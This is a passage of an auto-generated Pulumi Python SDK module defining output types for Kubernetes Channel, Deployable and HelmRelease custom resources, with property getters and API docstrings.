def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ChannelSpecConfigMapRef(dict):
"""
Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
Reference to a ConfigMap which contains additional settings for accessing the channel. For example, the `insecureSkipVerify` option for accessing HTTPS endpoints can be set in the ConfigMap to indicate a insecure connection.
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ChannelSpecGates(dict):
"""
Criteria for promoting a Deployable from the sourceNamespaces to Channel.
"""
def __init__(__self__, *,
annotations: Optional[Mapping[str, str]] = None,
label_selector: Optional['outputs.ChannelSpecGatesLabelSelector'] = None,
name: Optional[str] = None):
"""
Criteria for promoting a Deployable from the sourceNamespaces to Channel.
:param Mapping[str, str] annotations: The annotations which must present on a Deployable for it to be eligible for promotion.
:param 'ChannelSpecGatesLabelSelectorArgs' label_selector: A label selector for selecting the Deployables.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if label_selector is not None:
pulumi.set(__self__, "label_selector", label_selector)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def annotations(self) -> Optional[Mapping[str, str]]:
"""
The annotations which must present on a Deployable for it to be eligible for promotion.
"""
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="labelSelector")
def label_selector(self) -> Optional['outputs.ChannelSpecGatesLabelSelector']:
"""
A label selector for selecting the Deployables.
"""
return pulumi.get(self, "label_selector")
@property
@pulumi.getter
def name(self) -> Optional[str]:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ChannelSpecGatesLabelSelector(dict):
"""
A label selector for selecting the Deployables.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.ChannelSpecGatesLabelSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector for selecting the Deployables.
:param Sequence['ChannelSpecGatesLabelSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.ChannelSpecGatesLabelSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ChannelSpecGatesLabelSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ChannelSpecSecretRef(dict):
"""
For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For a `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For a `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpec(dict):
"""
DeployableSpec defines the desired state of Deployable
"""
def __init__(__self__, *,
template: Mapping[str, Any],
channels: Optional[Sequence[str]] = None,
dependencies: Optional[Sequence['outputs.DeployableSpecDependencies']] = None,
overrides: Optional[Sequence['outputs.DeployableSpecOverrides']] = None,
placement: Optional['outputs.DeployableSpecPlacement'] = None):
"""
DeployableSpec defines the desired state of Deployable
:param 'DeployableSpecPlacementArgs' placement: Placement field to be referenced in specs, align with Fedv2, add placementref
"""
pulumi.set(__self__, "template", template)
if channels is not None:
pulumi.set(__self__, "channels", channels)
if dependencies is not None:
pulumi.set(__self__, "dependencies", dependencies)
if overrides is not None:
pulumi.set(__self__, "overrides", overrides)
if placement is not None:
pulumi.set(__self__, "placement", placement)
@property
@pulumi.getter
def template(self) -> Mapping[str, Any]:
return pulumi.get(self, "template")
@property
@pulumi.getter
def channels(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "channels")
@property
@pulumi.getter
def dependencies(self) -> Optional[Sequence['outputs.DeployableSpecDependencies']]:
return pulumi.get(self, "dependencies")
@property
@pulumi.getter
def overrides(self) -> Optional[Sequence['outputs.DeployableSpecOverrides']]:
return pulumi.get(self, "overrides")
@property
@pulumi.getter
def placement(self) -> Optional['outputs.DeployableSpecPlacement']:
"""
Placement field to be referenced in specs, align with Fedv2, add placementref
"""
return pulumi.get(self, "placement")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpecDependencies(dict):
"""
Dependency of Deployable Properties field is the flexiblity for different Kind
"""
def __init__(__self__, *,
annotations: Optional[Mapping[str, str]] = None,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
labels: Optional[Mapping[str, str]] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
Dependency of Deployable Properties field is the flexiblity for different Kind
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter
def annotations(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def labels(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "labels")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpecOverrides(dict):
"""
Overrides field in deployable
"""
def __init__(__self__, *,
cluster_name: str,
cluster_overrides: Sequence[Mapping[str, Any]]):
"""
Overrides field in deployable
"""
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "cluster_overrides", cluster_overrides)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> str:
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter(name="clusterOverrides")
def cluster_overrides(self) -> Sequence[Mapping[str, Any]]:
return pulumi.get(self, "cluster_overrides")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpecPlacement(dict):
"""
Placement field to be referenced in specs, align with Fedv2, add placementref
"""
def __init__(__self__, *,
cluster_selector: Optional['outputs.DeployableSpecPlacementClusterSelector'] = None,
clusters: Optional[Sequence['outputs.DeployableSpecPlacementClusters']] = None,
local: Optional[bool] = None,
placement_ref: Optional['outputs.DeployableSpecPlacementPlacementRef'] = None):
"""
Placement field to be referenced in specs, align with Fedv2, add placementref
:param 'DeployableSpecPlacementClusterSelectorArgs' cluster_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param 'DeployableSpecPlacementPlacementRefArgs' placement_ref: ObjectReference contains enough information to let you inspect or modify the referred object.
"""
if cluster_selector is not None:
pulumi.set(__self__, "cluster_selector", cluster_selector)
if clusters is not None:
pulumi.set(__self__, "clusters", clusters)
if local is not None:
pulumi.set(__self__, "local", local)
if placement_ref is not None:
pulumi.set(__self__, "placement_ref", placement_ref)
@property
@pulumi.getter(name="clusterSelector")
def cluster_selector(self) -> Optional['outputs.DeployableSpecPlacementClusterSelector']:
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
return pulumi.get(self, "cluster_selector")
@property
@pulumi.getter
def clusters(self) -> Optional[Sequence['outputs.DeployableSpecPlacementClusters']]:
return pulumi.get(self, "clusters")
@property
@pulumi.getter
def local(self) -> Optional[bool]:
return pulumi.get(self, "local")
@property
@pulumi.getter(name="placementRef")
def placement_ref(self) -> Optional['outputs.DeployableSpecPlacementPlacementRef']:
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
"""
return pulumi.get(self, "placement_ref")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpecPlacementClusterSelector(dict):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.DeployableSpecPlacementClusterSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['DeployableSpecPlacementClusterSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.DeployableSpecPlacementClusterSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpecPlacementClusterSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpecPlacementClusters(dict):
"""
GenericClusterReference - in alignment with kubefed
"""
def __init__(__self__, *,
name: str):
"""
GenericClusterReference - in alignment with kubefed
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableSpecPlacementPlacementRef(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class DeployableStatus(dict):
"""
DeployableStatus defines the observed state of Deployable
"""
def __init__(__self__, *,
target_clusters: Optional[Any] = None):
"""
DeployableStatus defines the observed state of Deployable
"""
if target_clusters is not None:
pulumi.set(__self__, "target_clusters", target_clusters)
@property
@pulumi.getter(name="targetClusters")
def target_clusters(self) -> Optional[Any]:
return pulumi.get(self, "target_clusters")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class HelmReleaseRepo(dict):
"""
HelmReleaseRepo defines the repository of HelmRelease
"""
def __init__(__self__, *,
chart_name: Optional[str] = None,
config_map_ref: Optional['outputs.HelmReleaseRepoConfigMapRef'] = None,
insecure_skip_verify: Optional[bool] = None,
secret_ref: Optional['outputs.HelmReleaseRepoSecretRef'] = None,
source: Optional['outputs.HelmReleaseRepoSource'] = None,
version: Optional[str] = None):
"""
HelmReleaseRepo defines the repository of HelmRelease
:param str chart_name: ChartName is the name of the chart within the repo
:param 'HelmReleaseRepoConfigMapRefArgs' config_map_ref: Configuration parameters to access the helm-repo defined in the CatalogSource
:param bool insecure_skip_verify: Used to skip repo server's TLS certificate verification
:param 'HelmReleaseRepoSecretRefArgs' secret_ref: Secret to use to access the helm-repo defined in the CatalogSource.
:param 'HelmReleaseRepoSourceArgs' source: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Source holds the url toward the helm-chart
:param str version: Version is the chart version
"""
if chart_name is not None:
pulumi.set(__self__, "chart_name", chart_name)
if config_map_ref is not None:
pulumi.set(__self__, "config_map_ref", config_map_ref)
if insecure_skip_verify is not None:
pulumi.set(__self__, "insecure_skip_verify", insecure_skip_verify)
if secret_ref is not None:
pulumi.set(__self__, "secret_ref", secret_ref)
if source is not None:
pulumi.set(__self__, "source", source)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="chartName")
def chart_name(self) -> Optional[str]:
"""
ChartName is the name of the chart within the repo
"""
return pulumi.get(self, "chart_name")
@property
@pulumi.getter(name="configMapRef")
def config_map_ref(self) -> Optional['outputs.HelmReleaseRepoConfigMapRef']:
"""
Configuration parameters to access the helm-repo defined in the CatalogSource
"""
return pulumi.get(self, "config_map_ref")
@property
@pulumi.getter(name="insecureSkipVerify")
def insecure_skip_verify(self) -> Optional[bool]:
"""
Used to skip repo server's TLS certificate verification
"""
return pulumi.get(self, "insecure_skip_verify")
@property
@pulumi.getter(name="secretRef")
def secret_ref(self) -> Optional['outputs.HelmReleaseRepoSecretRef']:
"""
Secret to use to access the helm-repo defined in the CatalogSource.
"""
return pulumi.get(self, "secret_ref")
@property
@pulumi.getter
def source(self) -> Optional['outputs.HelmReleaseRepoSource']:
"""
INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Source holds the url toward the helm-chart
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def version(self) -> Optional[str]:
"""
Version is the chart version
"""
return pulumi.get(self, "version")
